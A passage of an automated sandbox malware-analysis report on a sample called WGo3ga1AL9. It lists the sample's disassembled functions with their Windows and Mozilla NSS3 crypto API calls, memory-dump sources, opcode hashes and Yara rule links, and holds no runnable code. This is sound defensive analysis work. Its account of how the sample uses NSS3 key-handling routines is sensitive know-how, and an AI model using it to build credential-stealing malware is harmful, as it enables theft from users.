                                                                                                                                              • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,009996C0,?,004210F4), ref: 00416C52
                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009996C0,?,004210F4), ref: 00416C60
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00416C7A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                              • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                                                                                                                              • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                                                                                                                              • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                                                                                                                              • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                                                                                                                              Function 6C72CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C741E10: TlsGetValue.KERNEL32 ref: 6C741E36
                                                                                                                                                • Part of subcall function 6C741E10: EnterCriticalSection.KERNEL32(?,?,?,6C71B1EE,2404110F,?,?), ref: 6C741E4B
                                                                                                                                                • Part of subcall function 6C741E10: PR_Unlock.NSS3 ref: 6C741E76
                                                                                                                                              • free.MOZGLUE(?,6C72D079,00000000,00000001), ref: 6C72CDA5
                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6C72D079,00000000,00000001), ref: 6C72CDB6
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C72D079,00000000,00000001), ref: 6C72CDCF
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6C72D079,00000000,00000001), ref: 6C72CDE2
                                                                                                                                              • free.MOZGLUE(?), ref: 6C72CDE9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1720798025-0
                                                                                                                                              • Opcode ID: dc5804417c6803546dd7d1cd8dfffd925d66b7c8ea6470fd9f04519a2c567804
                                                                                                                                              • Instruction ID: 6ab783935ea170ae396a609ccec168f2f93d705ef1b8d89b00f74d4b05b895ec
                                                                                                                                              • Opcode Fuzzy Hash: dc5804417c6803546dd7d1cd8dfffd925d66b7c8ea6470fd9f04519a2c567804
                                                                                                                                              • Instruction Fuzzy Hash: 4F11C2B6B01111BBEB00AE65EE49D96B72DFF1426E7144131F90987E01E73AE434CBE1
                                                                                                                                              Function 6C792CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C792CEC
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C792D02
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C792D1F
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C792D42
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C792D5B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                              • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                              • Instruction ID: 227605bb550a852316d7537ec0fd3da1ad8c12a7b3ee79bfc6ea44c27c847977
                                                                                                                                              • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                              • Instruction Fuzzy Hash: AF0104B1A40604AFE770AE25FD4ABC7B3A1EF51318F004535E85986721E332F9158793
                                                                                                                                              Function 6C792D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C792D9C
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C792DB2
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C792DCF
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C792DF2
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C792E0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                              • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                              • Instruction ID: 483e3222dea85e673eb9206e100f7b11d724fa840afe2f41ec313362b6ab21d7
                                                                                                                                              • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                              • Instruction Fuzzy Hash: A901C4B1A50200AFEB70AE25FD4DBC7B7A5EF51318F004535E85986B22D732F9258693
                                                                                                                                              Function 6C72AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C713090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C72AE42), ref: 6C7130AA
                                                                                                                                                • Part of subcall function 6C713090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7130C7
                                                                                                                                                • Part of subcall function 6C713090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7130E5
                                                                                                                                                • Part of subcall function 6C713090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C713116
                                                                                                                                                • Part of subcall function 6C713090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C71312B
                                                                                                                                                • Part of subcall function 6C713090: PK11_DestroyObject.NSS3(?,?), ref: 6C713154
                                                                                                                                                • Part of subcall function 6C713090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71317E
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7099FF,?,?,?,?,?,?,?,?,?,6C702D6B,?), ref: 6C72AE67
                                                                                                                                              • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7099FF,?,?,?,?,?,?,?,?,?,6C702D6B,?), ref: 6C72AE7E
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C702D6B,?,?,00000000), ref: 6C72AE89
                                                                                                                                              • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C702D6B,?,?,00000000), ref: 6C72AE96
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C702D6B,?,?), ref: 6C72AEA3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 754562246-0
                                                                                                                                              • Opcode ID: 5aa0bb8df06cdbe7299684072cfa83b62bae8e98efdb4ce953bc48fe4c565754
                                                                                                                                              • Instruction ID: 9dcef20888e979726880f27eee0bd9513f226b2d0f46207e4b002ddce322b606
                                                                                                                                              • Opcode Fuzzy Hash: 5aa0bb8df06cdbe7299684072cfa83b62bae8e98efdb4ce953bc48fe4c565754
                                                                                                                                              • Instruction Fuzzy Hash: BF01A4ABF1411057E701A16CAE9FAAF315C8B8766CF080432E909D7B41FA1AD91A42E3
                                                                                                                                              Function 6C81BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C817AFE,?,?,?,?,?,?,?,?,6C81798A), ref: 6C81BDC3
                                                                                                                                              • free.MOZGLUE(?,?,6C817AFE,?,?,?,?,?,?,?,?,6C81798A), ref: 6C81BDCA
                                                                                                                                              • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C817AFE,?,?,?,?,?,?,?,?,6C81798A), ref: 6C81BDE9
                                                                                                                                              • free.MOZGLUE(?,00000000,00000000,?,6C817AFE,?,?,?,?,?,?,?,?,6C81798A), ref: 6C81BE21
                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,6C817AFE,?,?,?,?,?,?,?,?,6C81798A), ref: 6C81BE32
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3662805584-0
                                                                                                                                              • Opcode ID: 026fb376a91c5b5160369d68bfa128343286d3c621d72ffb40874d9ddc3cac86
                                                                                                                                              • Instruction ID: f469e73ce12fcf6940ffc08df73f371a18a36031519a85572e2742c79f24e399
                                                                                                                                              • Opcode Fuzzy Hash: 026fb376a91c5b5160369d68bfa128343286d3c621d72ffb40874d9ddc3cac86
                                                                                                                                              • Instruction Fuzzy Hash: DE1116B5B052019FDB60DF2AC809A223BB6BB0A24DB4424B9E58A87701D7399414CFD2
                                                                                                                                              Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • StrStrA.SHLWAPI(009A0720,00000000,00000000,?,00409F71,00000000,009A0720,00000000), ref: 004193FC
                                                                                                                                              • lstrcpyn.KERNEL32(006D7580,009A0720,009A0720,?,00409F71,00000000,009A0720), ref: 00419420
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,009A0720), ref: 00419437
                                                                                                                                              • wsprintfA.USER32 ref: 00419457
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                              • String ID: %s%s
                                                                                                                                              • API String ID: 1206339513-3252725368
                                                                                                                                              • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                                                              • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                                                                                                                              • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                                                              • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                                                                                                                              Function 6C817C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_Free.NSS3(?), ref: 6C817C73
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817C83
                                                                                                                                              • malloc.MOZGLUE(00000001), ref: 6C817C8D
                                                                                                                                              • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C817C9F
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C817CAD
                                                                                                                                                • Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 105370314-0
                                                                                                                                              • Opcode ID: b62018073d0029e9442821989eb10377335aa50ab2c22a577a1044bbc618799b
                                                                                                                                              • Instruction ID: af4238cdeea41dcecf73d11d0d1d0b3df89830cc92456ad3813c64d98c3ffacb
                                                                                                                                              • Opcode Fuzzy Hash: b62018073d0029e9442821989eb10377335aa50ab2c22a577a1044bbc618799b
                                                                                                                                              • Instruction Fuzzy Hash: 63F0AFB1A142076BEB509F7A9E099477B98EF05269B018839E80DC3F00EB34E114CAE5
                                                                                                                                              Function 6C81ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DeleteCriticalSection.KERNEL32(6C81A6D8), ref: 6C81AE0D
                                                                                                                                              • free.MOZGLUE(?), ref: 6C81AE14
                                                                                                                                              • DeleteCriticalSection.KERNEL32(6C81A6D8), ref: 6C81AE36
                                                                                                                                              • free.MOZGLUE(?), ref: 6C81AE3D
                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,?,6C81A6D8), ref: 6C81AE47
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$CriticalDeleteSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 682657753-0
                                                                                                                                              • Opcode ID: 24dd25d7ec3332671265cf2718fc18a938553541a3064c27bfae125ef55b8152
                                                                                                                                              • Instruction ID: b5c751b0eb89d8096ec1b6ef18932caf382bfc4d7691b9dd71cf534d818966b2
                                                                                                                                              • Opcode Fuzzy Hash: 24dd25d7ec3332671265cf2718fc18a938553541a3064c27bfae125ef55b8152
                                                                                                                                              • Instruction Fuzzy Hash: B3F0F6B9601A02A7CA219F68D8089577BB8BF8A778B100338F12A83941D775E015CFD1
                                                                                                                                              Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 0041CA7E
                                                                                                                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                                                              • __getptd.LIBCMT ref: 0041CA95
                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041CAA3
                                                                                                                                              • __lock.LIBCMT ref: 0041CAB3
                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                              • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                                                                                                                              • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                                                                                                                              • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                                                                                                                              • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                                                                                                                              Function 6C6A7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A7D35
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
